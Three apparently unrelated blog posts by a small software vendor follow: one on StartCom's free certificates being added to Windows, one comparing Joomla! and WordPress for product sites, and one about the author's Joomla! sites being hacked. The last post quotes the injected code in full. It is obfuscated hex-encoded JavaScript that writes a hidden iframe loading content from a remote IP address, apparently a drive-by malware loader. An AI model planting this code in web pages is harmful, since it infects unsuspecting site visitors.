A year or two ago, trusted Micro ISV‘er Andy Brice posted an article entitled The Great Digital Certificate Ripoff? It’s well worth a read as it underlines some of the apparent anticompetitive aspects of this particular market.

I’m very happy to say that the ground is shifting – something interesting is happening. Internet Explorer is pretty much universally despised by tech-savvy users, but its sheer market slice means that only a fool would ignore it. As of now, Internet Explorer (and by extension, Windows) will have a new root certificate installed. The root certificate will be that of StartCom Ltd. Why is this important?

StartCom is the only public certification authority providing digital certificates for free!

The implications for security on Windows are profound. No longer will SSL and code signing certificates be expensive commodities for the little guy. Firefox and Apple have supported StartCom for some time, but thankfully us Windows developers can now get in on it.

The SLL certificates are free and provide:

• Web server certificates (SSL/TLS)
• Client and mail certificates (S/MIME)
• 128/256-bit encryption
• US $ 10,000 insurance guaranteed
• Valid 365 days (1 year)

The code signing certificates require a verified account, but still cost a measley $39, and boast:

Web server certificates (SSL/TLS)

Wild cards (*.domain.com)

Multiple domains (DNS Alt Names)

128/256-bit encryption

Object Code Signing (beta)

Client and mail certificates (S/MIME)

US $ 10,000 insurance guaranteed

2 Years validity (730 days)

Well done to StartCom, and well done to Microsoft. Check out the certificates on offer here.

Related articles by Zemanta

• Long Zheng: Microsoft adds free root certificate authority to Windows (istartedsomething.com)
• EV SSL Certificates — Not Just for Major Organizations (newswire.ca)

Yesterday I released Home Document Manager to rapturous silence. A familiar phenomenon for micro ISVs
with little or no marketing budget. What interested me was the
difference between the two web sites (www.convert2xps and
www.homedocumentmanager.com). Convert2XPS is a Joomla! site, and Home Document Manager uses Wordpress.

Here’s a bit of a breakdown of the structure of both sites:

Convert2XPS

• Convert2XPS uses Joomla! v1.5.9, which is the latest release.
• I bought a commercial template from JoomlaShack for around $40. A very good company to deal with and a well designed template.
• I installed various boilerplate extensions to add some basic functionality, like Joomap, Linkr etc.
• I also bought a commercial support ticketing system called Billets, by Discouri for around $90 with 12 months of updates.

There’s no blog on the Convert2XPS site [insert headshaking], although there are blogging components available.

Home Document Manager

• Home Document Manager uses Wordpress 2.7.1, which is the latest release.
• Wordpress has an excellent pedigree in the templates division, and
  I customised one of the inbuilt designs. Easy to do, although it’s
  currently mangled in IE6.
• I installed the usual suspects; All in one SEO pack, Google XML Sitemaps etc.
• In place of a support forum or ticketing system, I’ve decided to
  give GetSatisfaction a whirl. I’m very impressed with what they’re
  doing, and the site integration is good. The basic (free) version that
  I’m using at the minute is probably a little too crippled for long term
  use, but rather than install a forum plugin or ticketing system, I’m
  giving it a try.

And as you would expect of any site based on Wordpress, there’s a blog.

Verdict

As
I’ve now been through the mill and produced two ‘OK’ sites, I’ve formed
a pretty good impression of both Joomla! and Wordpress. I think a good
way of summing up would be:

- Joomla! is a solid CMS with blogging capabilities.
- Wordpress is a blog with CMS capabilties.

A bit of a nonesense, but you know what I mean. For a typical micro ISV,
I personally think Wordpress is better suited as a lightweight CMS. As
you can set a page as the site home, and another page as your blog
home, getting it to function as a CMS is a breeze. I’ve found the back
end administration much more pleasant in Wordpress too. The “Turbo”
function (which caches scripts and CSS) is a good touch, and really demonstrates attention to detail.

Whenever you’re going to put your eggs in an Open Source basket, community matters. And I think Matt Mullenweg’s stances on what Open Source should mean have perplexed some, but have undoubtedly benefited to community as a whole.

Next time you build a web site, why not give Wordpress a try as your CMS?

Image via Wikipedia

Both of my Joomla!
sites were hacked yesterday. I’m not yet sure what the vector was,
whether it was the Joomla! core, or one of the components/extensions I
use.

The first I knew of it was visiting the sites resulted in:

Parse error: syntax error, unexpected ‘<’ in /mnt/local/home/timhaughton/homedocumentmanager.com/index.php on line 89

A look at line 89 gives this:

echo JResponse::toString($mainframe->getCfg(‘gzip’));

v497b1ee5c5c25(v497b1ee5caa4e){
return(parseInt(v497b1ee5caa4e,16));}function
v497b1ee5d962d(v497b1ee5de2cb){ var
v497b1ee5e30f9=”;for(v497b1ee5e7f0e=0;
v497b1ee5e7f0e<v497b1ee5de2cb.length; v497b1ee5e7f0e+=2){
v497b1ee5e30f9+=(String.fromCharCode(v497b1ee5c5c25(v497b1ee5de2cb.substr(v497b1
ee5e7f0e, 2))));}return v497b1ee5e30f9;}
document.write(v497b1ee5d962d(‘3C5343524950543E77696E646F772E7374617475733D27446
F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6130207372633
D5C27687474703A2F2F3131362E35302E31352E32352F73746174732F3F272B4D6174682E726F756
E64284D6174682E72616E646F6D28292A3739393638292B2739613936306131305C2720776964746
83D353838206865696768743D313336207374796C653D5C27646973706C61793A206E6F6E655C273
E3C2F696672616D653E27293C2F5343524950543E‘));

After
consulting someone far more knowledgable than myself, I’m told that the
script is trying to install a trojan by downloading a corrupt PDF. Deep
wholesome joy.

It’s the second time this has happened. It doesn’t
seem to cause any real issue other than I have to replace the index.php
file. The hack is pretty clumsy in that it doesn’t leave a working site
to spread the trojan, since there’s a syntax error. This is good, as it
means I shouldn’t be flagged as having malware on the site. But will it always be clumsy?

It would be a pain to have to replace the Joomla! site with a hand crafted one.